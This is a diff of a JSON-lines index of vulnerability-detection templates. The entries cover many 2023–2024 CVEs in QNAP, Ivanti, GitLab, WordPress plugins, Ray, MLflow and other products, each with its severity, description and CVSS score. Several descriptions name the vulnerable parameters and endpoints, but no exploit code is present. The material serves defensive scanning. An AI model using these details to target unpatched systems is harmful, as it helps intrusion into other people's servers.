-{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"}
+{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"medium","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"}
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
+{"ID":"CVE-2023-48084","Info":{"Name":"Nagios XI \u003c 5.11.3 - SQL Injection","Severity":"critical","Description":"SQL injection vulnerability in Nagios XI before version 5.11.3 via the bulk modification tool.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-48084.yaml"}
{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
{"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"}
{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"}
+{"ID":"CVE-2023-4973","Info":{"Name":"Academy LMS 6.2 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in Academy LMS 6.2 on Windows. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument searched_word/searched_tution_class_type[]/searched_price_type[]/searched_duration[] leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4973.yaml"}
{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"}
{"ID":"CVE-2023-49785","Info":{"Name":"ChatGPT-Next-Web - SSRF/XSS","Severity":"critical","Description":"Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-49785.yaml"}
+{"ID":"CVE-2023-5003","Info":{"Name":"Active Directory Integration WP Plugin \u003c 4.1.10 - Log Disclosure","Severity":"high","Description":"The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-5003.yaml"}
{"ID":"CVE-2023-50290","Info":{"Name":"Apache Solr - Host Environment Variables Leak via Metrics API","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor Vulnerability in Apache Solr.\nThe Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users can specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host,unlike Java system properties which are set per-Java-proccess.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-50290.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2023-5089","Info":{"Name":"Defender Security \u003c 4.1.0 - Protection Bypass (Hidden Login Page)","Severity":"medium","Description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5089.yaml"}
@@ -2291,16 +2323,19 @@
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
+{"ID":"CVE-2023-5991","Info":{"Name":"Hotel Booking Lite \u003c 4.8.5 - Arbitrary File Download \u0026 Deletion","Severity":"critical","Description":"The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5991.yaml"}
{"ID":"CVE-2023-6018","Info":{"Name":"Mlflow - Arbitrary File Write","Severity":"critical","Description":"An attacker can overwrite any file on the server hosting MLflow without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6018.yaml"}
{"ID":"CVE-2023-6020","Info":{"Name":"Ray Static File - Local File Inclusion","Severity":"high","Description":"LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6020.yaml"}
{"ID":"CVE-2023-6021","Info":{"Name":"Ray API - Local File Inclusion","Severity":"high","Description":"LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6021.yaml"}
{"ID":"CVE-2023-6023","Info":{"Name":"VertaAI ModelDB - Path Traversal","Severity":"high","Description":"The endpoint \"/api/v1/artifact/getArtifact?artifact_path=\" is vulnerable to path traversal. The main cause of this vulnerability is due to the lack of validation and sanitization of the artifact_path parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6023.yaml"}
{"ID":"CVE-2023-6038","Info":{"Name":"H2O ImportFiles - Local File Inclusion","Severity":"high","Description":"An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6038.yaml"}
-{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"}
+{"ID":"CVE-2023-6063","Info":{"Name":"WP Fastest Cache 1.2.2 - SQL Injection","Severity":"high","Description":"The WP Fastest Cache WordPress plugin before 1.2.2 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6063.yaml"}
+{"ID":"CVE-2023-6065","Info":{"Name":"Quttera Web Malware Scanner \u003c= 3.4.1.48 - Sensitive Data Exposure","Severity":"medium","Description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-6065.yaml"}
{"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"}
{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"}
{"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"}
{"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"}
+{"ID":"CVE-2023-6389","Info":{"Name":"WordPress Toolbar \u003c= 2.2.6 - Open Redirect","Severity":"medium","Description":"The plugin redirects to any URL via the \"wptbto\" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6389.yaml"}
{"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"}
{"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"}
{"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"}
@@ -2310,44 +2345,85 @@
{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"}
{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"}
{"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"}
-{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
+{"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"}
+{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"}
+{"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"}
+{"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"}
{"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"}
+{"ID":"CVE-2024-0235","Info":{"Name":"EventON (Free \u003c 2.2.8, Premium \u003c 4.5.5) - Information Disclosure","Severity":"medium","Description":"The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-0235.yaml"}
{"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"}
{"ID":"CVE-2024-0337","Info":{"Name":"Travelpayouts \u003c= 1.1.16 - Open Redirect","Severity":"medium","Description":"The plugin is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0337.yaml"}
{"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"}
{"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"}
+{"ID":"CVE-2024-0881","Info":{"Name":"Combo Blocks \u003c 2.2.76 - Improper Access Control","Severity":"medium","Description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-0881.yaml"}
{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"}
{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"}
{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"}
+{"ID":"CVE-2024-1183","Info":{"Name":"Gradio - Server Side Request Forgery","Severity":"medium","Description":"An SSRF (Server-Side Request Forgery) vulnerability exists in the gradio-app/gradio repository, allowing attackers to scan and identify open ports within an internal network. By manipulating the 'file' parameter in a GET request, an attacker can discern the status of internal ports based on the presence of a 'Location' header or a 'File not allowed' error in the response.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-1183.yaml"}
{"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"}
{"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"}
{"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"}
{"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"}
+{"ID":"CVE-2024-1380","Info":{"Name":"Relevanssi (A Better Search) \u003c= 4.22.0 - Query Log Export","Severity":"medium","Description":"The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1380.yaml"}
+{"ID":"CVE-2024-1561","Info":{"Name":"Gradio Applications - Local File Read","Severity":"high","Description":"Local file read by calling arbitrary methods of Components class\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-1561.yaml"}
{"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"}
{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"}
{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"}
{"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"}
{"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"}
+{"ID":"CVE-2024-21683","Info":{"Name":"Atlassian Confluence Data Center and Server - Remote Code Execution","Severity":"high","Description":"Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-21683.yaml"}
{"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"}
{"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"}
{"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"}
